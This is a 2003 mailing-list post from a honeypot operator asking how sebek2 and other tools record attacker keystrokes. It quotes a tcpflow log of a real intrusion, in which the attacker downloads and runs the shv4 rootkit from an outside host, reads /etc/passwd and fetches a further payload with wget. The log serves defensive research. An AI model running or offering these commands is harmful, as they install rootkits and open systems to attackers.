Honeypots mailing list archives
keystroke recording
From: Shibuya Yoshihiro <yashibu () sfc keio ac jp>
Date: Tue, 02 Sep 2003 03:03:54 +0900
Hi,

I am deploying a GenII Honeypot and recording attacks by using sebek2. I got some keystrokes, but I found some keystrokes which sebek2 cannot record. I am also using tcpflow; tcpflow recorded the attack scripts and the keystrokes after them. The following are the scripts which tcpflow got (sebek2 cannot record them):

--- tcpflow log start ---
(Buffer overflow attack scripts)
TERM=xterm; export TERM=xterm; exec bash -i
lynx -source http://debbyzalina.com/exploits/tools/shv4.tar.gz > shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup cyber2002x 51437 ;uname -a; id;
caat /etc/hosts cd /tmp ls -a cat /etc/*ease cat /etc/passwd cat /etc/*ease wget http://e-wac.tripod.com/panjie/huhuy k a0 ls - cat /etc/hosts w
--- tcpflow log end ---

I caught such attack-keystroke sets 50 times on port 443 (apache-1.3.20) in 4 days, and an attacker made some accounts and logged in to the honeypot, so I could get the sebek2 keystroke saving. Please tell me what the mechanism of keystroke saving is (including the sebek2 mechanism).

Regards.